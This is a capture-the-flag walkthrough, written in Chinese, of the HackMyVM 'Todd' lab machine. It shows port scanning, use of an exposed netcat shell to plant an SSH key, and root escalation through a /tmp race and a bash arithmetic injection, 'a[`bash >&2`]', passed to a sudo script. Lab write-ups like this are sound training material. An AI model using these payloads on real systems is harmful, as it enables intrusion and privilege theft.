HackMyVM-Todd-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.133  08:00:27:17:89:31       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:f0:6f:4b       VMware, Inc.

6 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.061 seconds (124.21 hosts/sec). 4 responded
❯ export ip=192.168.60.133
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
RustScan: allowing you to send UDP packets into the void 1200x faster than NMAP

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.133:22
Open 192.168.60.133:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-01 17:45 CST
Initiating ARP Ping Scan at 17:45
Scanning 192.168.60.133 [1 port]
Completed ARP Ping Scan at 17:45, 0.10s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 17:45
Completed Parallel DNS resolution of 1 host. at 17:45, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 17:45
Scanning 192.168.60.133 [2 ports]
Discovered open port 22/tcp on 192.168.60.133
Discovered open port 80/tcp on 192.168.60.133
Completed SYN Stealth Scan at 17:45, 0.03s elapsed (2 total ports)
Nmap scan report for 192.168.60.133
Host is up, received arp-response (0.00068s latency).
Scanned at 2025-04-01 17:45:31 CST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack ttl 64
80/tcp open  http    syn-ack ttl 64
MAC Address: 08:00:27:17:89:31 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds
           Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

枚举目录

❯ gobuster dir -u http://$ip -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.133
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   403,404
[+] User Agent:              gobuster/3.6
[+] Extensions:              html,zip,txt,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 2060]
/tools                (Status: 301) [Size: 316] [--> http://192.168.60.133/tools/]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

在/tools目录中存在我们常用的渗透工具

因此可以推测很可能存在后门

不过我进行了模糊测试，猜测可能含有LFI，无果

用户提权

但当你再次尝试扫描端口的时候会发现开放了很多不明所以的端口

❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Open ports, closed hearts.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.133:22
Open 192.168.60.133:80
Open 192.168.60.133:5045
Open 192.168.60.133:5059
Open 192.168.60.133:6440
Open 192.168.60.133:6610
Open 192.168.60.133:7066
Open 192.168.60.133:16909
Open 192.168.60.133:19253
Open 192.168.60.133:25400
Open 192.168.60.133:27765
Open 192.168.60.133:31556
Open 192.168.60.133:31671
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-01 21:06 CST
Initiating ARP Ping Scan at 21:06
Scanning 192.168.60.133 [1 port]
Completed ARP Ping Scan at 21:06, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:06
Completed Parallel DNS resolution of 1 host. at 21:06, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:06
Scanning 192.168.60.133 [13 ports]
Discovered open port 22/tcp on 192.168.60.133
Discovered open port 80/tcp on 192.168.60.133
Completed SYN Stealth Scan at 21:06, 0.04s elapsed (13 total ports)
Nmap scan report for 192.168.60.133
Host is up, received arp-response (0.00054s latency).
Scanned at 2025-04-01 21:06:08 CST for 0s

PORT      STATE  SERVICE REASON
22/tcp    open   ssh     syn-ack ttl 64
80/tcp    open   http    syn-ack ttl 64
5045/tcp  closed osp     reset ttl 64
5059/tcp  closed sds     reset ttl 64
6440/tcp  closed heliosd reset ttl 64
6610/tcp  closed unknown reset ttl 64
7066/tcp  closed unknown reset ttl 64
16909/tcp closed unknown reset ttl 64
19253/tcp closed unknown reset ttl 64
25400/tcp closed unknown reset ttl 64
27765/tcp closed unknown reset ttl 64
31556/tcp closed unknown reset ttl 64
31671/tcp closed unknown reset ttl 64
MAC Address: 08:00:27:17:89:31 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds
           Raw packets sent: 14 (600B) | Rcvd: 14 (556B)

我利用nmap扫描一下，保存到文件

利用comm比较两个文件中的内容相同的部分

❯ nmap -p- $ip -oN a.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-01 21:07 CST
Nmap scan report for 192.168.60.133
Host is up (0.0021s latency).
Not shown: 65522 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
5924/tcp  open  unknown
5929/tcp  open  unknown
7066/tcp  open  unknown
15930/tcp open  unknown
16548/tcp open  unknown
22650/tcp open  unknown
25595/tcp open  unknown
27503/tcp open  unknown
30116/tcp open  unknown
31633/tcp open  unknown
32320/tcp open  unknown
MAC Address: 08:00:27:17:89:31 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
❯ nmap -p- $ip -oN b.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-01 21:09 CST
Nmap scan report for 192.168.60.133
Host is up (0.00064s latency).
Not shown: 65523 closed tcp ports (reset)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
3469/tcp  open  pluribus
7066/tcp  open  unknown
7273/tcp  open  openmanage
7820/tcp  open  unknown
11315/tcp open  unknown
19638/tcp open  unknown
21474/tcp open  unknown
25764/tcp open  unknown
28602/tcp open  unknown
30971/tcp open  unknown
MAC Address: 08:00:27:17:89:31 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 4.85 seconds
❯ comm -12 a.txt b.txt
Nmap scan report for 192.168.60.133
comm: file 1 is not in sorted order
comm: file 2 is not in sorted order
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
7066/tcp  open  unknown
MAC Address: 08:00:27:17:89:31 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

comm: input is not in sorted order

得到7066端口是一直都存在开放的

nc连接一下

不过不定时的会断掉nc，但可以得知，拿到的是普通用户的权限

❯ nc $ip 7066
id
uid=1000(todd) gid=1000(todd) groups=1000(todd)
pwd
/root
ls
cd ~

所以我要趁他没关闭之前赶紧写个公钥进去

❯ nc $ip 7066
id
uid=1000(todd) gid=1000(todd) groups=1000(todd)
cd ~
mkdir -p .ssh
cd .ssh
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCmhumzHA2kpAF9W/XS9FK1CjvRlb1iP5kC8RhE/oyVaePE+eZudjlyvGyuJb1GDTad9Zi0hIW14bqdvfgU7HIYJKV1Y/goqs6BddT7KkYEs5643MxxErViGZP52hF3zggAi7Ho/BlnjRMPev1c1ZGzPbR+dpxd3mB6LUkiSEGwbXNOdmmleqmcZAkVEh7vi90/m1S9btqQpbbVRICGBQY6IHyl/PY6jX/W/38u/hhzj0u4poqqubOIWF2RA231osvqrG151Yeg3RYMJW89pK8D6f+Ma1h7sLE3VLlYe5kA2O0aKz0dgLK5KOshI08XhzpwBLKkpYlMRJ4U0KqJ04jhaF1P7o4Wa+hViAdKxOTBL5Y8RoFEGKVmhT9/pAel7BAmuBU0keGS3JaA5OltDBfbSHPPskdrUg/gWhbsjtt7Z+tTzTOSgl1gpQzHnTnfaMosF3WkwQrYq2sjcNEEmtRCF4Gyn92vD1MWfhepC0lGW3Z3o7AGt38ZuiH6/cR9LsjjIDqG90C2yxH4yNEbgW9/0qf6iD+ghDz9mBtzk0dJHMU6/GoxXTY1e+/bAlqDCF2NR+fogTm7DeGNJ9CuaxXF+laYa1wSeIKdMbdi+fmfwqVbiDxxmqbtqJVGmsbmoB1UYP+XZ74LcOPbsPoNzWo53P87a3U2620bIQx32yFPXw== Pepster@primary">authorized_keys
chmod 600 authorized_keys
-----------------------------------------------------
❯ ssh todd@$ip -i ../.ssh/id_rsa
Linux todd 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
$ bash
todd@todd:~$ cat user.txt
Todd{eb93009a2719640de486c4f68daf62ec}

不过你会发现过了一会ssh也会中断

重新连接一下，在opt目录下发现了几个脚本文件

todd@todd:/opt$ ls -al
total 40
drwxr-xr-x  2 root root  4096 Mar 22 10:40 .
drwxr-xr-x 18 root root  4096 Nov 13  2020 ..
-rwx------  1 root root   138 Mar 22 08:00 create_nc2.sh
-rwx---r--  1 root root   141 Mar 22 07:42 create_nc.sh
-rwx------  1 root root 16608 Mar 22 07:21 fake_ssh
-rwx------  1 root root    17 Mar 22 07:07 kill_todd.sh
todd@todd:/opt$ cat create_nc.sh
#!/bin/bash

create_ssh(){
        sudo -u todd nc -e /opt/fake_ssh -lp $1
}

for i in $(seq 10)
do
        a=$((RANDOM))
        sleep 0.2
        create_ssh $a &
done

而且用户存在sudo权限

todd@todd:~$ sudo -l
Matching Defaults entries for todd on todd:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User todd may run the following commands on todd:
    (ALL : ALL) NOPASSWD: /bin/bash /srv/guess_and_check.sh
    (ALL : ALL) NOPASSWD: /usr/bin/rm
    (ALL : ALL) NOPASSWD: /usr/sbin/reboot

尝试直接删除这个脚本

todd@todd:~$ sudo rm /opt/kill_todd.sh

Root提权

同时查看一下guess_and_check.sh

todd@todd:/tmp$ cat /srv/guess_and_check.sh
#!/bin/bash

cat << EOF
                                   .     **
                                *           *.
                                              ,*
                                                 *,
                         ,                         ,*
                      .,                              *,
                    /                                    *
                 ,*                                        *,
               /.                                            .*.
             *                                                  **
             ,*                                               ,*
                **                                          *.
                   **                                    **.
                     ,*                                **
                        *,                          ,*
                           *                      **
                             *,                .*
                                *.           **
                                  **      ,*,
                                     ** *,     HackMyVM
EOF


# check this script used by human
a=$((RANDOM%1000))
echo "Please Input [$a]"

echo "[+] Check this script used by human."
echo "[+] Please Input Correct Number:"
read -p ">>>" input_number

[[ $input_number -ne "$a" ]] && exit 1

sleep 0.2
true_file="/tmp/$((RANDOM%1000))"
sleep 1
false_file="/tmp/$((RANDOM%1000))"

[[ -f "$true_file" ]] && [[ ! -f "$false_file" ]] && cat /root/.cred || exit 2

前面需要输入正确的随机数，已经给你显示出来了

后面则会赋予两个变量在tmp目录下两个名为随机数的文件，并且判断存在$true_file不存在$false_file，才会读取 /root/.cred

同时可以发现在给予变量的之前会进行sleep

那么就可以进行条件竞争，在/tmp目录下生成好多随机数文件

碰碰运气，会有个随机数存在$true_file并不存在$false_file

todd@todd:/tmp$ for i in {1..1001};do touch /tmp/$((RANDOM%1000)); sleep 0.1; done
todd@todd:/tmp$ sudo /bin/bash /srv/guess_and_check.sh
                                   .     **
                                *           *.
                                              ,*
                                                 *,
                         ,                         ,*
                      .,                              *,
                    /                                    *
                 ,*                                        *,
               /.                                            .*.
             *                                                  **
             ,*                                               ,*
                **                                          *.
                   **                                    **.
                     ,*                                **
                        *,                          ,*
                           *                      **
                             *,                .*
                                *.           **
                                  **      ,*,
                                     ** *,     HackMyVM
Please Input [138]
[+] Check this script used by human.
[+] Please Input Correct Number:
>>>138
fake password
todd@todd:/tmp$ su root
Password:
root@todd:/tmp# cd /root/
root@todd:~# ls
root.txt
root@todd:~# cat root.txt
Todd{389c9909b8d6a701217a45104de7aa21}

这一种就是纯碰运气，但还有一个就是命令劫持的点

在比较的过程中可以利用bash中的数组，而且数组是可以执行命令的

我们并将输出重定向到标准错误中

todd@todd:/tmp$ sudo /bin/bash /srv/guess_and_check.sh
                                   .     **
                                *           *.
                                              ,*
                                                 *,
                         ,                         ,*
                      .,                              *,
                    /                                    *
                 ,*                                        *,
               /.                                            .*.
             *                                                  **
             ,*                                               ,*
                **                                          *.
                   **                                    **.
                     ,*                                **
                        *,                          ,*
                           *                      **
                             *,                .*
                                *.           **
                                  **      ,*,
                                     ** *,     HackMyVM
Please Input [537]
[+] Check this script used by human.
[+] Please Input Correct Number:
>>>a[`bash >&2`]
root@todd:/tmp#